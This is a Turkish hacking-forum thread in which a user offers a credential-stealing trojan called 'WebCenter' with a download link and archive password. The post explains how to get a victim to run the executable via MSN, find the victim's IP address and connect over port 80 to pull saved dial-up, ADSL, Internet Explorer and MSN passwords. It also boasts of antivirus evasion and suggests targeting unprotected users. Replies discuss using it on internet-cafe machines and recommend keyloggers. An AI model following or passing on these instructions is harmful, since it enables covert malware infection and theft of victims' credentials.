WebCenter !! Tarzı hoşunuza gidecek Eski ama Etkili bir Stealer !! [Resimli Anlatım]

TuRK_HaRD

нα¢кιηg αяαşтıямα¢ıѕı
Katılım
9 Haz 2006
Mesajlar
3,955
Reaction score
0
Puanları
0
Konum
Tanrı Dağı
Programımız bir stealer, yani server mantığı ile çalışıp kurbanın bilgisayarı üzerinedeki bilgileri çalma amaçlı bir program..

İlk olarak şunu belirteyim.. Bu programı çalıştırabilmeniz için kurbanın usb modem kullanması

veya dial up bağlantı (örneğin 145-146 ile) ile nete bağlanıp dahili bir modem kullanması gereklidir.


VERDİĞİM UNDETECT YÖNTEMİ İLE BİRÇOK AV'DEN KAÇIRABİLİYORUZ SERVER'IMIZI;)


Bir exe dosyasından ibaret olan programımızı kurbana yedirmemiz ile işlem başlıyor. Bu

dosyayı kurbana açtırmamız ve onun IP adresini bilmemiz ile dialup veya adsl şifrelerine, IE

üzerindeki girdiğim tüm bilgilere, o an açık olan programlarına, portlarına ve başlangıç

dosyalarına
rahatlıkla erişebiliriz.


Programımızın AV'lerle arası pek iyi değil, çünkü eski bir program olması sebiyle tanımayan

AV kalmıyor.. Artık bu programı antivirüs kullanmayan kişiler üstünde denemelisiniz..

VirüsTotal sonuçlarını da ekleyeyim de;)

virtotal.jpg


MSN üzerinden veya herhangi bir şekilde programı kurbana yedirmemiz ardından kurbanın

IP adresini almamız gerekiyor.. BU iş için bildiğiniz üzere birçok yöntem var ama

Messenger Plus! Live İle IP Bulma konusu altında açıkladığım yöntem ile

bu işi de kolaylıkla yapabilirsiniz..


Programı kurbanımıza açtırdık, IP adresini de öğrendik.. Şimdi internet explorer

penceresine http://kurbanin_IPsi:80 şeklinde yazıyoruz, örneğin http://85.170.48.76:80

gibi.. eğer herhangi bir sayfa açılmazsa veya boş bir ekran kalırsa kurbanımızın makinasını

kapatıp açması yani restart atması gereklidir.. Eğer sabit IP yok ise bu işlme sonucu IP de

değişeceği için tekrar IP'sini almamız gerekiyor..


Eğer aşağıdaki gibi bir pencere açılır ise giriş işlemin başarılı olmuşuz demektir:

1.jpg


Şimdi kurbanın makinasına 80.porttan yani http (web,internet) portundan bağlanmış

oluyoruz.. Yapabileceğimiz 6 işlem var, üstteki resmimizde kısaca neler yapabileceğimiz

yazıyor.. Şimdi teker teker bu işlemleri açıklayalım..


Dialupass v2.41 ile bilgisayarda kayıtlı dialup veya adsl şifrelerini alabiliriz:

2.jpg


Protected Storage PassView v1.62
ile Internet Explorer üzerinde girilmiş ve hatırlatma

seçeneği işaretlenmiş olan tüm girişleri öğrenebilirsiniz.. Neler neler var, kendimde

denedim, adresimden telefonuma, girdiğim şifrelerden yazdığım bir çok bilgiye ulaşabildim..

işinize en çok yarayacak bölüm burası olacaktır:

3.jpg


MessenPass 1.03 ile bilgisayardaki kayıtlı MSN şifrelerini alabilirsiniz..


Şimdi Information bölümüne geçelim, yani kurbanın makinası hakkında bilgi alabileceğimiz bölüm..:

StartupRun v1.22 ile bilgisayarın açılışta çalışan programlarını öğrenebiliriz:

4.jpg


CurrProcess v1.10 ile o an çalışmakta olan programları öğrenebiliriz:

5.jpg


CurrPorts v1.02 ile de makinada açık olan ve kullanılan portları görebilirsiniz.. Bu kısım da

işinize yarayabilir, herhangi bir trojan portu açık ise eğer daha detaylı saldırılar yapılabilir:

6.jpg


Programımızın yapabildiklerini kısaca açıkladık.. Bu farklı tarzdaki trojan ile web üzerinden

kurbanın birçok bilgisine erişebiliyoruz..


Download = http://rapidshare.com/files/59784315/WebCenter__by_TuRK_HaRD.rar

rar pass = turk_hard


Sorularınızı bu başlık altında alabilirim, kolay kullanımı ile fazla bir sıkıntı çekmeyeceğiniz kanısındayım..

Kolay gelsin, saygılar...



(PORGRAMIN ANLATIMI TAMAMEN KENDİME AİTTİR, İZİNSİZ KOPYALANMAMASI RİCA EDİLİR..)


Beğendiğiniz paylaşımlarda
TEŞEKKÜR BUTONU'nu kullanmayı unutmayın..
 
omfarka' Alıntı:
internet kafede açsam bunu evden kontrol edebilir miyim

internet cafedeki makinanın IP adresinin bilmen koşulukla tabiki.. ama bu internet cafesi

makinaları için diğer keyloggerlar (iopus starr, n-keylogger, ayo spy) daha uygun olabilir..
 
1sn. 1sn.

yani sadece IP bilmek yeterlimi yoksa Hem IP bilecik Hemde Karşı PC'ye mi Yedirecik Serveri:saskin

biraz daha ney açıklama yaparmısın TurK_HarD:goz:

BİDE LİNKİ YENİLERSEN ÇHOOOK SEVİNİRİZ :goz:
 
link yenilendi..

sadece IP bilmek yeterli değil tabiki.. programı da karşı tarafa yedirmemiz lazım..
 
Geri
Üst